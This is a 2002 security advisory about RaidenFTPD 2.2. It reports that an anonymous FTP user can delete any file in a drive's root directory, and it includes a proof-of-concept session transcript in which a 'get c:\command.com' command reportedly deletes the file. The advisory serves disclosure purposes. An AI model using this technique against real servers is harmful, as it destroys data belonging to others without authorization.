Reported January 14, 2002, by Tamer Sahin.
VERSIONS AFFECTED
-
RaidenFTPD 2.2 for Windows 2000, Windows NT, and Windows 9x
DESCRIPTION
A
vulnerability exists in Raiden FTPD 2.2 that lets an attacker delete any file on
the system located in the root directory (c:\, d:\, etc.).
DEMONSTRATION
The discoverer posted the following demonstration as proof-of-concept:
C:\>ftp 192.168.10.3
Connected to 192.168.10.3.
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from
http://playstation2.idv.tw/raiden-ftpd-site/
220-Download english version from
http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2002/01/13 17:07)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (192.168.10.3:(none)): anonymous
331 Password required for anonymous .
Password:
230-------------------------------------------------------------------
- ----+
230- lvl=level r=root s=superusers n=normal g=guest * = all
userlevels
230- grp=group n=nukers s=sitebot
230-for more detailed descriptions, please visit raidenftpd homepage
230-http://playstation2.idv.tw/raidenftpd/raiden-ftpd-doc/help-sitecmd
.html
230-------------------------------------------------------------------
- ----+
230 User anonymous logged in, proceed.
ftp> get c:\command.com
Error opening local file command.com.
> command.com:Permission denied
ftp> quit
221-
221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- -=-=-=-=-
221- anonymous , ºAñ¦ñ-ñW¦¦ "0" BYTES, ñU+n "0"
BYTES
221- +QºA¦ßí@~~~~S·ñ¯~~~~
221- ªA¿úíA+w¬nªAª+Ñ·-\{!!!!
221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- -=-=-=-=-
221-<This system is running unregistered version of RaidenFTPD>.
221 Goodbye.
And file has been deleted!
VENDOR RESPONSE
The vendor, RaidenFTPD, has been notified but hasn't issued a patch.
CREDIT
Discovered by Tamer
Sahin of Security Office.
